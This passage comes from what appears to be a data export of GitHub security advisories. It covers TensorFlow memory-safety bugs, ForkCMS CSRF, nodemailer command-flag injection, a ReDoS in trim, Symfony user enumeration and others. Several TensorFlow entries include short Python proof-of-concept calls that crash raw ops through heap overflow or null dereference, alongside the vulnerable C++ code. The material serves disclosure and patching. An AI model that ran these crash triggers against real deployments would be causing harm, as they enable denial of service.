array](https://github.com/tensorflow/tensorflow/blob/ff70c47a396ef1e3cb73c90513da4f5cb71bebba/tensorflow/python/lib/core/ndarray_tensor.cc#L113-L169) is vulnerable to a type confusion: + +```cc + int pyarray_type = PyArray_TYPE(array); + PyArray_Descr* descr = PyArray_DESCR(array); + switch (pyarray_type) { + ... + case NPY_VOID: + // Quantized types are currently represented as custom struct types. + // PyArray_TYPE returns NPY_VOID for structs, and we should look into + // descr to derive the actual type. + // Direct feeds of certain types of ResourceHandles are represented as a + // custom struct type. + return PyArrayDescr_to_TF_DataType(descr, out_tf_datatype); + ... + } +``` + +For the tensor types involved in the above example, the `pyarray_type` is `NPY_VOID` but the `descr` field is such that `descr->field = NULL`. Then [`PyArrayDescr_to_TF_DataType`](https://github.com/tensorflow/tensorflow/blob/ff70c47a396ef1e3cb73c90513da4f5cb71bebba/tensorflow/python/lib/core/ndarray_tensor.cc#L72-L77) will trigger a null dereference: + +```cc +Status PyArrayDescr_to_TF_DataType(PyArray_Descr* descr, + TF_DataType* out_tf_datatype) { + PyObject* key; + PyObject* value; + Py_ssize_t pos = 0; + if (PyDict_Next(descr->fields, &pos, &key, &value)) { + ... + } +} +``` + +This is because the Python's `PyDict_Next` implementation would dereference the first argument. + +### Patches +We have patched the issue in GitHub commit [030af767d357d1b4088c4a25c72cb3906abac489](https://github.com/tensorflow/tensorflow/commit/030af767d357d1b4088c4a25c72cb3906abac489). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360 as well as Ye Zhang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-452g-f7fp-9jf7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29513'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/030af767d357d1b4088c4a25c72cb3906abac489'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:42:09Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-pvgf-mrr4-cw7r,2021-04-06T22:22:33Z,2021-05-06T18:53:09Z,,['CVE-2020-23960'],Cross-Site Request Forgery in ForkCMS,"Multiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'forkcms/forkcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23960'}, {'type': 'WEB', 'url': 'https://github.com/forkcms/forkcms/pull/3123'}, {'type': 'WEB', 'url': 'https://www.fork-cms.com/blog/detail/fork-5.8.3-released'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T22:22:33Z', 'nvd_published_at': '2021-01-11T16:15:00Z'}" +1.4.0,GHSA-2xgj-xhgf-ggjv,2021-05-17T21:56:29Z,2021-05-21T14:28:37Z,,['CVE-2021-29612'],Heap buffer overflow in `BandedTriangularSolve`,"### Impact +An attacker can trigger a heap buffer overflow in Eigen implementation of `tf.raw_ops.BandedTriangularSolve`: + +```python +import tensorflow as tf +import numpy as np + +matrix_array = np.array([]) +matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) +rhs_array = np.array([1,1]) +rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) +tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L269-L278) calls `ValidateInputTensors` for input validation but fails to validate that the two tensors are not empty: + +```cc +void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) { + OP_REQUIRES( + ctx, in0.dims() >= 2, + errors::InvalidArgument(""In[0] ndims must be >= 2: "", in0.dims())); + + OP_REQUIRES( + ctx, in1.dims() >= 2, + errors::InvalidArgument(""In[1] ndims must be >= 2: "", in1.dims())); +} +``` + +Furthermore, since `OP_REQUIRES` macro only stops execution of current function after setting `ctx->status()` to a non-OK value, callers of helper functions that use `OP_REQUIRES` must check value of `ctx->status()` before continuing. This doesn't happen [in this op's implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L219), hence the validation that is present is also not effective. + +### Patches +We have patched the issue in GitHub commit [ba6822bd7b7324ba201a28b2f278c29a98edbef2](https://github.com/tensorflow/tensorflow/commit/ba6822bd7b7324ba201a28b2f278c29a98edbef2) followed by GitHub commit [0ab290774f91a23bebe30a358fde4e53ab4876a0](https://github.com/tensorflow/tensorflow/commit/0ab290774f91a23bebe30a358fde4e53ab4876a0). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2xgj-xhgf-ggjv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29612'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/0ab290774f91a23bebe30a358fde4e53ab4876a0'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ba6822bd7b7324ba201a28b2f278c29a98edbef2'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:56:29Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-26j7-6w8w-7922,2021-05-18T17:03:33Z,2021-05-21T14:26:43Z,,['CVE-2021-29586'],Division by zero in optimized pooling implementations in TFLite,"### Impact +Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling [`ComputePaddingHeightWidth`](https://github.com/tensorflow/tensorflow/blob/3f24ccd932546416ec906a02ddd183b48a1d2c83/tensorflow/lite/kernels/pooling.cc#L90). + +Since users can craft special models which will have `params->stride_{height,width}` be zero, this will result in a division by zero. + +### Patches +We have patched the issue in GitHub commit [5f7975d09eac0f10ed8a17dbb6f5964977725adc](https://github.com/tensorflow/tensorflow/commit/5f7975d09eac0f10ed8a17dbb6f5964977725adc). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-26j7-6w8w-7922'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29586'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5f7975d09eac0f10ed8a17dbb6f5964977725adc'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:03:33Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-62gx-355r-9fhg,2021-05-18T23:30:55Z,2021-05-21T14:21:05Z,,['CVE-2021-29518'],Session operations in eager mode lead to null pointer dereferences,"### Impact +In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: + +```python +import tensorflow as tf +tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) +``` +```python +import tensorflow as tf +tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07']) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/eebb96c2830d48597d055d247c0e9aebaea94cd5/tensorflow/core/kernels/session_ops.cc#L104) dereferences the session state pointer without checking if it is valid: + +```cc + OP_REQUIRES_OK(ctx, ctx->session_state()->GetTensor(name, &val)); +``` + +Thus, in eager mode, `ctx->session_state()` is nullptr and the call of the member function is undefined behavior. + +### Patches +We have patched the issue in GitHub commit [ff70c47a396ef1e3cb73c90513da4f5cb71bebba](https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-62gx-355r-9fhg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29518'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:30:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-p2j5-3f4c-224r,2023-09-14T18:44:34Z,2021-05-18T18:21:21Z,,['CVE-2020-13170'],Improper Input Validation in HashiCorp Consul,"HashiCorp Consul and Consul Enterprise did not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0-beta1'}, {'fixed': '1.6.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13170'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/pull/8068'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/242994a016a181d6c62a5bb83189716ad13d4216'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.6.6/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.7.4/CHANGELOG.md'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T22:01:59Z', 'nvd_published_at': None}" +1.4.0,GHSA-3wxm-m9m4-cprj,2021-05-20T20:24:22Z,2021-05-21T16:24:44Z,,[],Import of incorrectly embargoed keys could cause early publication,"### Impact + +If your installation is using the `export-importer` service, there is potential impact. +If your installation is not importing keys via the `export-importer` services, your installation is not impacted. + +In versions `0.19.1` and earlier, the `export-importer` service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo keys. + +This could allow allow for imported keys to be re-published before they have expired, allowing for potential replay of RPIs. + +### Patches + +This is patched in `v0.18.3` and all versions `0.19.2` and later. + +### Workarounds + +Ensure that the servers you are importing export zip files from are not publishing keys too early. + +### References + +n/a + +### For more information + +If you have any questions or comments about this advisory +* Open an issue in [exposure-notifications-server](https://github.com/google/exposure-notifications-server/) +* Email us at [exposure-notifications-feedback@google.com](mailto:exposure-notifications-feedback@google.com)",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/exposure-notifications-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/google/exposure-notifications-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.19.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-server/security/advisories/GHSA-3wxm-m9m4-cprj'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:24:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-5pv8-ppvj-4h68,2022-10-25T20:37:42Z,2021-05-13T20:23:02Z,,['CVE-2021-21424'],Prevent user enumeration using Guard or the new Authenticator-based Security,"Description +----------- + +The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. + +Resolution +---------- + +We now ensure that 403s are returned whether the user exists or not if the password is invalid or if the user does not exist. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011) for branch 3.4. + +Credits +------- + +I would like to thank James Isaac and Mathias Brodala for reporting the issue and Robin Chalas for fixing the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '3.4.48'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-guard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '3.4.48'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-guard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-guard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '3.4.48'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-5pv8-ppvj-4h68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21424'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KENRNLB3FYXYGDWRBH2PDBOZZKOD7VY4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RH7TMM5CHQYBFFGXWRPJDPB3SKCZXI2M/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UC7BND775DVZDQT3RMGD2HVB2PKLJDJW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VRUS2H2SSOQWNLBD35SKIWIDQEMV2PD3/'}]","{'cwe_ids': ['CWE-200', 'CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T15:25:38Z', 'nvd_published_at': '2021-05-13T16:15:00Z'}" +1.4.0,GHSA-48ww-j4fc-435p,2021-04-19T22:42:19Z,2021-05-10T19:16:52Z,,['CVE-2020-7769'],Command injection in nodemailer,This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodemailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7769'}, {'type': 'WEB', 'url': 'https://github.com/nodemailer/nodemailer/commit/ba31c64c910d884579875c52d57ac45acc47aa54'}, {'type': 'WEB', 'url': 'https://github.com/nodemailer/nodemailer/blob/33b62e2ea6bc9215c99a9bb4bfba94e2fb27ebd0/lib/sendmail-transport/index.js#L75'}, {'type': 'WEB', 'url': 'https://github.com/nodemailer/nodemailer/blob/33b62e2ea6bc9215c99a9bb4bfba94e2fb27ebd0/lib/sendmail-transport/index.js%23L75'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1039742'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEMAILER-1038834'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/nodemailer'}]","{'cwe_ids': ['CWE-88'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:42:19Z', 'nvd_published_at': '2020-11-12T09:15:00Z'}" +1.4.0,GHSA-w5p7-h5w8-2hfq,2022-04-27T19:19:28Z,2021-05-10T18:44:22Z,,['CVE-2020-7753'],Regular Expression Denial of Service in trim,All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'trim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7753'}, {'type': 'WEB', 'url': 'https://github.com/component/trim/pull/8'}, {'type': 'PACKAGE', 'url': 'https://github.com/component/trim/'}, {'type': 'WEB', 'url': 'https://github.com/component/trim/blob/master/index.js'}, {'type': 'WEB', 'url': 'https://github.com/component/trim/blob/master/index.js%23L6'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r10faad1ef9166d37a1a5c9142b1af7099b8ecdc5ad05c51b8ea993d9@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51ff3c2a4c7b8402f321eae7e624672cc2295c7bc8c12c8b871f6b0b@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75b8d0b88833d7d96afcdce3ead65e212572ead4e7a9f34d21040196@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8462df3b6484e778905c09cd49a8912e1a302659860017ebe36da03@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcc7c2865a52b544a8e49386c6880e9b9ab29bfce1052b5569d09ee4a@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1022132'}, {'type': 'WEB', 'url': 